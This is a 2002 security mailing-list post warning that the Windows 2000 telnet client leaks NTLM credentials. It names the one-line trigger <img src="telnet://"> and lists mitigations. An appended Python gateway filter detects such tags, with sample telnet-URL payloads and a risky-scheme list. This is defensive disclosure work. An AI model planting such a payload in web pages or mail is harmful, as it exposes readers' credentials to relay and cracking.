Re: [fw-wiz] Danger of telnet on w2k (Was: re: Annoying pop-ups)

From: Mikael Olsson
Date: Wed Oct 30 14:20:02 2002

Mikael Olsson wrote:
> PLUS port 23 (Telnet!)
> Sure, it isn't on by default, but people found ways to abuse DCOM to
> turn it on remotely. Uh oh.

I just figured that this deserved a bit of extra mention. I'm sure that
most people think "Bah. I've got a good admin password, and I don't log
on via telnet anyway, so I'm safe".

If so, here's something you need to know: Microsoft embedded NTLM auth
in telnet in w2k. This means that, unless instructed to do otherwise,
the w2k telnet client will send out NTLM authentication data of the
currently logged on user whenever you telnet to an NTLM-enabled server.

This same data sent out can be relayed back to your box and used
to log on to you without delay. It can also be fed to l0phtcrack.

Microsoft did indeed send out an advisory about this two years ago,
but I figured it deserved another mention, seeing as how people still
tend to forget about this. All it needs is an image tag like
<img src="telnet://">

Stuff that can help:

- Read
  and install the patch. The patch is to display a warning before NTLM
  is sent to stuff outside the local zone. However, we have seen the zone
  schemes be subverted before, so don't rely on it.

- Block port 23 inbound to avoid the direct relay back to your telnet
  port. Disabling the telnet service might be a good idea, but don't
  rely on it.

- Run "telnet" without arguments. Type "unset ntlm".
  This prevents the telnet client from sending ntlm hashes at all.

- Blocking port 23 outbound will NOT help.

Mikael Olsson, Clavister AB
Storgatan 12, Box 393, SE-891 28 ÖRNSKÖLDSVIK, Sweden
Phone: +46 (0)660 29 92 00   Mobile: +46 (0)70 26 222 05
Fax: +46 (0)660 122 50       WWW:
Learn to count in Swedish! "ett, två, tre, fyra, fem, sex, sju ..."
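As an added example (not from Mikael's post, nor code from Microsoft or Clavister), here is a gateway-side check for the trigger described above: it parses HTML and flags any element a browser fetches without a click whose URL uses the telnet: scheme, so the w2k telnet client is never launched. The tag/attribute table, the extra rlogin and tn3270 schemes, and the sample HTML are assumptions constructed for the example.

```python
"""Flag HTML that auto-loads a telnet:// URL, e.g. <img src="telnet://...">.

Constructed example for a mail or web gateway filter: an element the browser
fetches automatically whose URL uses the telnet scheme would start the w2k
telnet client, which then sends the logged-on user's NTLM credentials.
"""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Attributes a browser fetches without user interaction (assumed table).
AUTO_FETCH = {
    "img": ("src", "lowsrc"),
    "iframe": ("src",),
    "frame": ("src",),
    "embed": ("src",),
    "object": ("data",),
    "script": ("src",),
    "link": ("href",),
    "body": ("background",),
}

# telnet is the scheme from the post; rlogin and tn3270 are assumed
# handler schemes with the same effect, added for illustration.
RISKY_SCHEMES = {"telnet", "rlogin", "tn3270"}


class TelnetUrlFinder(HTMLParser):
    """Collects (tag, attribute, url) for every auto-fetched risky URL."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names; values are kept as-is.
        for attr, value in attrs:
            if value is None or attr not in AUTO_FETCH.get(tag, ()):
                continue
            # Strip surrounding whitespace and lowercase so " Telnet://x "
            # is not missed by a naive prefix comparison.
            scheme = urlsplit(value.strip().lower()).scheme
            if scheme in RISKY_SCHEMES:
                self.findings.append((tag, attr, value))


def find_telnet_urls(html):
    """Return the list of (tag, attribute, url) findings for one HTML document."""
    parser = TelnetUrlFinder()
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample: one benign image, one hidden telnet image, one link
# (needs a click, so not flagged) and one telnet iframe.
SAMPLE_HTML = """<html><body background="http://example.test/bg.gif">
<img src="http://example.test/a.gif">
<IMG SRC=" Telnet://relay.example.test:23/ " alt="tracker">
<a href="telnet://relay.example.test/">click me</a>
<iframe src="TELNET://10.0.0.1"></iframe>
</body></html>"""

if __name__ == "__main__":
    for tag, attr, url in find_telnet_urls(SAMPLE_HTML):
        print(f"blocked: <{tag} {attr}={url!r}>")
```

A gateway would reject or rewrite the document when the returned list is non-empty; an `<a href>` is deliberately not flagged because it requires a click.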